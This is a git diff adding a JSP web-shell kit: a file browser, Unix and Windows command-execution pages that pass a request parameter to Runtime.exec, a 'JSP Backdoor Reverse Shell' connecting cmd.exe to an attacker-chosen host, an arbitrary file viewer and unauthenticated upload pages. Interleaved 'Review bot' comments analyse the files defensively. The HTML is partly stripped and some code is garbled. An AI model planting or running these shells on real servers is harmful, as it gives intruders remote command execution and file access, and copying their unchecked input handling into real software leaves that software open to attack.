f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> +
    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.println("" + + "" + + "" + + "" + + ""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if (entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the 
first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out + .println(""); + } + else { + out + .println(""); + } + out.print(""); + if (entry[i].isDirectory()) out.print(""); + else { + out.print(""); + } + 
out.println(""); // The edit link (or view, depending) + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out + .println("     
    "); + out.println("  " + FOL_IMG + "[..]"); + out + .println("     
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + // The download link + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    +

    + "> + + + +

    +

    + + + + + + +

    +
    +
    + "> + + + +
    + <% if (NATIVE_COMMANDS){%> +
    + "> + + + +
    <% + } + }%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
+<%
+ }
+%>
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/cmd.jsp b/jsp/hackk8/jsp2/cmd.jsp
new file mode 100644
index 0000000..6357276
--- /dev/null
+++ b/jsp/hackk8/jsp2/cmd.jsp
@@ -0,0 +1,35 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (unix)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    + + +
    +
    +<%
    +if (request.getParameter("cmd") != null) {
    +        out.println("Command: " + request.getParameter("cmd") + "
    "); + Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); + disr = dis.readLine(); + } + } +%> +
    +
+
+
diff --git a/jsp/hackk8/jsp2/cmdjsp.jsp b/jsp/hackk8/jsp2/cmdjsp.jsp
new file mode 100644
index 0000000..63625af
--- /dev/null
+++ b/jsp/hackk8/jsp2/cmdjsp.jsp
@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd"
+
+
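Review bot: The scriptlet in cmd.jsp hands `request.getParameter("cmd")` directly to `Runtime.getRuntime().exec(...)`, and nothing visible in the hunk authenticates the caller or restricts the command, so anyone who can reach the page starts processes with the servlet container's privileges. The same parameter is also written back into the response unescaped on the `Command:` line. jsp/hackk8/jsp2/cmdjsp.jsp and jsp/hackk8/jsp2/win32/cmd_win32.jsp repeat the pattern with a `cmd.exe` prefix. If these files are kept as detection samples, I would say so at the top of each, for example `<%-- SAMPLE: command-execution web shell, kept for detection testing; do not place under a served webapps directory --%>`, and store them under an extension the container does not compile. For scanning, a request parameter flowing into `Runtime.exec` inside a JSP is the line worth matching on.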
    + + +
    + +<%@ page import="java.io.*" %> +<% + String cmd = request.getParameter("cmd"); + String output = ""; + + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); + BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { + output += s; + } + } + catch(IOException e) { + e.printStackTrace(); + } + } +%> + +
    +<%=output %>
    +
    + + diff --git a/jsp/hackk8/jsp2/jsp-reverse.jsp b/jsp/hackk8/jsp2/jsp-reverse.jsp new file mode 100644 index 0000000..ae9a781 --- /dev/null +++ b/jsp/hackk8/jsp2/jsp-reverse.jsp @@ -0,0 +1,91 @@ +// backdoor.jsp +// http://www.security.org.sg/code/jspreverse.html + +<%@ +page import="java.lang.*, java.util.*, java.io.*, java.net.*" +% > +<%! +static class StreamConnector extends Thread +{ + InputStream is; + OutputStream os; + + StreamConnector(InputStream is, OutputStream os) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader isr = null; + BufferedWriter osw = null; + + try + { + isr = new BufferedReader(new InputStreamReader(is)); + osw = new BufferedWriter(new OutputStreamWriter(os)); + + char buffer[] = new char[8192]; + int lenRead; + + while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) + { + osw.write(buffer, 0, lenRead); + osw.flush(); + } + } + catch (Exception ioe) + + try + { + if(isr != null) isr.close(); + if(osw != null) osw.close(); + } + catch (Exception ioe) + } +} +%> + +

    JSP Backdoor Reverse Shell

    + +
    +IP Address + +Port + + +
    +

    +


    + +<% +String ipAddress = request.getParameter("ipaddress"); +String ipPort = request.getParameter("port"); + +if(ipAddress != null && ipPort != null) +{ + Socket sock = null; + try + { + sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); + + Runtime rt = Runtime.getRuntime(); + Process proc = rt.exec("cmd.exe"); + + StreamConnector outputConnector = + new StreamConnector(proc.getInputStream(), + sock.getOutputStream()); + + StreamConnector inputConnector = + new StreamConnector(sock.getInputStream(), + proc.getOutputStream()); + + outputConnector.start(); + inputConnector.start(); + } + catch(Exception e) +} +%> + + diff --git a/jsp/hackk8/jsp2/list.jsp b/jsp/hackk8/jsp2/list.jsp new file mode 100644 index 0000000..eb0db3a --- /dev/null +++ b/jsp/hackk8/jsp2/list.jsp @@ -0,0 +1,77 @@ +<%@ page import="java.util.*,java.io.*"%> +<% +// +// JSP_KIT +// +// list.jsp = Directory & File View +// +// by: Sierra +// modified: 27/06/2003 +// +%> +<% +if(request.getParameter("file")==null) { + %> + +
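Review bot: The second scriptlet of jsp-reverse.jsp opens a `Socket` to the `ipaddress` and `port` request parameters and wires it through two `StreamConnector` threads to a `cmd.exe` process, so the page attaches a shell on the server to an outbound connection whose endpoint the requester chooses. Nothing in the hunk checks who is asking, and the `catch` clauses appear without bodies in this rendering, so failures would leave nothing in the logs (the braces may simply have been lost in extraction). The two leading `//` lines sit outside any scriptlet and would be served as page text. I would document the host-side indicators at the top, e.g. `<%-- Indicators: servlet container JVM spawning cmd.exe and opening an outbound TCP connection --%>`. Blocking outbound connections from the application server and denying its account the ability to start shells are the controls that neutralise this file.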
    + + +
    + <% + } +%> +<% //read the file name. +try { +File f = new File(request.getParameter("file")); +if(f.isDirectory()) { + int i; + String fname = new String("Unknown"); + String fcolor = new String("Black"); + %> + + + <% + out.print("Path: " + f.toString() + "

    "); + File flist[] = f.listFiles(); + for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n"); + } + %> +
    + <% + + } else { + if(f.canRead() == true) { + InputStream in = new FileInputStream(f); + ServletOutputStream outs = response.getOutputStream(); + int left = 0; + try { + while((left) >= 0 ) { + left = in.read(); + outs.write(left); + } + } catch(IOException ex) {ex.printStackTrace();} + outs.flush(); + outs.close(); + in.close(); + } else { + out.print("Can't Read file
    "); + } + } +} catch(Exception ex) {ex.printStackTrace();} +%> \ No newline at end of file diff --git a/jsp/hackk8/jsp2/up.jsp b/jsp/hackk8/jsp2/up.jsp new file mode 100644 index 0000000..5df5d0d --- /dev/null +++ b/jsp/hackk8/jsp2/up.jsp @@ -0,0 +1,162 @@ + +<%@ page import="java.io.*,java.util.*,javax.servlet.*" %> +<% +// +// JSP_KIT +// +// up.jsp = File Upload (unix) +// +// by: Unknown +// modified: 27/06/2003 +// +%> + +
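Review bot: In list.jsp, `new File(request.getParameter("file"))` is used exactly as supplied, so the directory listing and the file read that follow reach any path the container account can read, with no base directory and no authentication in the hunk. The path and the entry names are also printed into the HTML unescaped. A file viewer that is meant to be served has to resolve the name against a fixed root and compare canonical paths before touching the file, along the lines of `if (!f.getCanonicalPath().startsWith(root.getCanonicalPath() + File.separator)) return;`, where `root` is a placeholder for a configured directory that this page does not define.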
    + + +
    + +<%! +public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{ + String boundary = null; + Enumeration enum = request.getHeaderNames(); + while(enum.hasMoreElements()){ + String header = (String)enum.nextElement(); + String hvalue = request.getHeader(header); + prop.setProperty((header).toLowerCase(),hvalue); + if("content-type".equalsIgnoreCase(header) ){ + int idx = hvalue.lastIndexOf("boundary="); + if(idx != -1 ){ + boundary= hvalue.substring(idx+9 , hvalue.length()); + } + } + } + return boundary; + +} +public String getFileName(String secondline){ + int len = secondline.length(); + int idx = secondline.lastIndexOf("filename="); + if(idx == -1 ) return null; + String filename = secondline.substring(idx+10 , len-1); + filename = filename.replace('\\','/'); + idx = filename.lastIndexOf("/"); + idx = idx + 1; + filename = filename.substring( idx ); + return filename; +} +%> +<% +String DPATH = "/tmp/"; +int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks +int MAXSIZE = 10; // 10 Mega Byte +String boundary = getBoundary(request,prop); +if(boundary == null ){ + boundary = prop.getProperty("boundary"); + }else{ + boundary = "--"+boundary; + } +if(boundary == null ){ + return; + } +Long contentsize = new Long(prop.getProperty("content-length","0")); +int c; +StringWriter st = new StringWriter(); +if(contentsize.longValue() < 1L ){ + return; + } +long l = contentsize.longValue() - ROUGHSIZE; +int KB = 1024; +int MB = 1024 * KB; +int csize = (int)(l / MB); +if(csize > MAXSIZE ){ + return; + } +ServletInputStream fin = request.getInputStream(); +int cn; +int count=0; +while((c=fin.read()) != -1 ){ + if( c == '\r') break; + st.write(c); + count++; + } +c=fin.read(); +String tboundary = st.getBuffer().toString(); +tboundary=tboundary.trim(); +if(! 
tboundary.equalsIgnoreCase( boundary) ){ + return; + } +st.close(); +st = null; +st = new StringWriter(); +while((c=fin.read()) != -1 ){ + if( c == '\r' ) break; + st.write(c); + } +c=fin.read(); +String secondline = st.getBuffer().toString(); +String filename = getFileName(secondline); +st.close(); +st = null; +st = new StringWriter(); +while((c=fin.read()) != -1 ){ + if( c == '\r' ) break; + st.write( c ); + } +c=fin.read(); + +fin.read(); +fin.read(); +File newfile = null; +FileOutputStream fout =null; +try{ + if(filename == null) throw new FileNotFoundException("File Name not found"); + newfile = new File(DPATH+filename); + fout = new FileOutputStream( newfile ); + }catch(FileNotFoundException fnexp){ + fin.close(); + return; + } + +byte b[] = null; +while(l > 1024L){ + b = new byte[1024]; + fin.read(b,0,1024); + fout.write(b); + b=null; + l -= 1024L; + } +if(l > 0){ + b = new byte[(int)l]; + fin.read(b,0,(int)l); + fout.write(b); + } + + +ByteArrayOutputStream baos = new ByteArrayOutputStream(); +while((c = fin.read()) != -1){ + baos.write(c); + } +String laststring = baos.toString(); +int idx = laststring.indexOf(boundary); +b = baos.toByteArray(); +if(idx > 2){ + fout.write(b,0,idx-2); + }else{ + fout.close(); + newfile.delete(); + return; + } +fout.flush(); +fout.close(); +fin.close(); + +out.println("FileName: " + newfile.getName()); +out.println("FileSize: " + newfile.length()); + +%> + + + + + diff --git a/jsp/hackk8/jsp2/win32/cmd_win32.jsp b/jsp/hackk8/jsp2/win32/cmd_win32.jsp new file mode 100644 index 0000000..21f2bdc --- /dev/null +++ b/jsp/hackk8/jsp2/win32/cmd_win32.jsp @@ -0,0 +1,31 @@ +<%@ page import="java.util.*,java.io.*,java.net.*"%> +<% +// +// JSP_KIT +// +// cmd.jsp = Command Execution (win32) +// +// by: Unknown +// modified: 27/06/2003 +// +%> + +
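Review bot: The upload scriptlet in up.jsp writes the request body to `DPATH+filename` with no authentication and no check that the target already exists, so any caller can create or overwrite files in `/tmp/`. Its size limit is computed from the client-supplied `content-length` header, and the tail of the body is buffered in a `ByteArrayOutputStream` until end of stream, so the limit does not bound what is actually read. jsp/hackk8/jsp2/win32/up_win32.jsp is the same code writing to `c:\`. `getFileName` does reduce the name to its last path segment, which appears to keep the write inside `DPATH`; that deserves a comment such as `// filename is cut to its last path segment, so the write stays under DPATH`. `prop` is used without a visible declaration and may be declared in markup lost from this rendering.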
    + + +
    +
    +<%
    +if (request.getParameter("cmd") != null) {
    +        out.println("Command: " + request.getParameter("cmd") + "\n
    "); + Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); disr = dis.readLine(); } + } +%> +
    +
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/win32/up_win32.jsp b/jsp/hackk8/jsp2/win32/up_win32.jsp
new file mode 100644
index 0000000..ff977ac
--- /dev/null
+++ b/jsp/hackk8/jsp2/win32/up_win32.jsp
@@ -0,0 +1,162 @@
+
+<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
+<%
+//
+// JSP_KIT
+//
+// up.jsp = File Upload (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    + + +
    + +<%! +public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{ + String boundary = null; + Enumeration enum = request.getHeaderNames(); + while(enum.hasMoreElements()){ + String header = (String)enum.nextElement(); + String hvalue = request.getHeader(header); + prop.setProperty((header).toLowerCase(),hvalue); + if("content-type".equalsIgnoreCase(header) ){ + int idx = hvalue.lastIndexOf("boundary="); + if(idx != -1 ){ + boundary= hvalue.substring(idx+9 , hvalue.length()); + } + } + } + return boundary; + +} +public String getFileName(String secondline){ + int len = secondline.length(); + int idx = secondline.lastIndexOf("filename="); + if(idx == -1 ) return null; + String filename = secondline.substring(idx+10 , len-1); + filename = filename.replace('\\','/'); + idx = filename.lastIndexOf("/"); + idx = idx + 1; + filename = filename.substring( idx ); + return filename; +} +%> +<% +String DPATH = "c:\\"; +int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks +int MAXSIZE = 10; // 10 Mega Byte +String boundary = getBoundary(request,prop); +if(boundary == null ){ + boundary = prop.getProperty("boundary"); + }else{ + boundary = "--"+boundary; + } +if(boundary == null ){ + return; + } +Long contentsize = new Long(prop.getProperty("content-length","0")); +int c; +StringWriter st = new StringWriter(); +if(contentsize.longValue() < 1L ){ + return; + } +long l = contentsize.longValue() - ROUGHSIZE; +int KB = 1024; +int MB = 1024 * KB; +int csize = (int)(l / MB); +if(csize > MAXSIZE ){ + return; + } +ServletInputStream fin = request.getInputStream(); +int cn; +int count=0; +while((c=fin.read()) != -1 ){ + if( c == '\r') break; + st.write(c); + count++; + } +c=fin.read(); +String tboundary = st.getBuffer().toString(); +tboundary=tboundary.trim(); +if(! 
tboundary.equalsIgnoreCase( boundary) ){ + return; + } +st.close(); +st = null; +st = new StringWriter(); +while((c=fin.read()) != -1 ){ + if( c == '\r' ) break; + st.write(c); + } +c=fin.read(); +String secondline = st.getBuffer().toString(); +String filename = getFileName(secondline); +st.close(); +st = null; +st = new StringWriter(); +while((c=fin.read()) != -1 ){ + if( c == '\r' ) break; + st.write( c ); + } +c=fin.read(); + +fin.read(); +fin.read(); +File newfile = null; +FileOutputStream fout =null; +try{ + if(filename == null) throw new FileNotFoundException("File Name not found"); + newfile = new File(DPATH+filename); + fout = new FileOutputStream( newfile ); + }catch(FileNotFoundException fnexp){ + fin.close(); + return; + } + +byte b[] = null; +while(l > 1024L){ + b = new byte[1024]; + fin.read(b,0,1024); + fout.write(b); + b=null; + l -= 1024L; + } +if(l > 0){ + b = new byte[(int)l]; + fin.read(b,0,(int)l); + fout.write(b); + } + + +ByteArrayOutputStream baos = new ByteArrayOutputStream(); +while((c = fin.read()) != -1){ + baos.write(c); + } +String laststring = baos.toString(); +int idx = laststring.indexOf(boundary); +b = baos.toByteArray(); +if(idx > 2){ + fout.write(b,0,idx-2); + }else{ + fout.close(); + newfile.delete(); + return; + } +fout.flush(); +fout.close(); +fin.close(); + +out.println("FileName: " + newfile.getName()); +out.println("FileSize: " + newfile.length()); + +%> + + + + +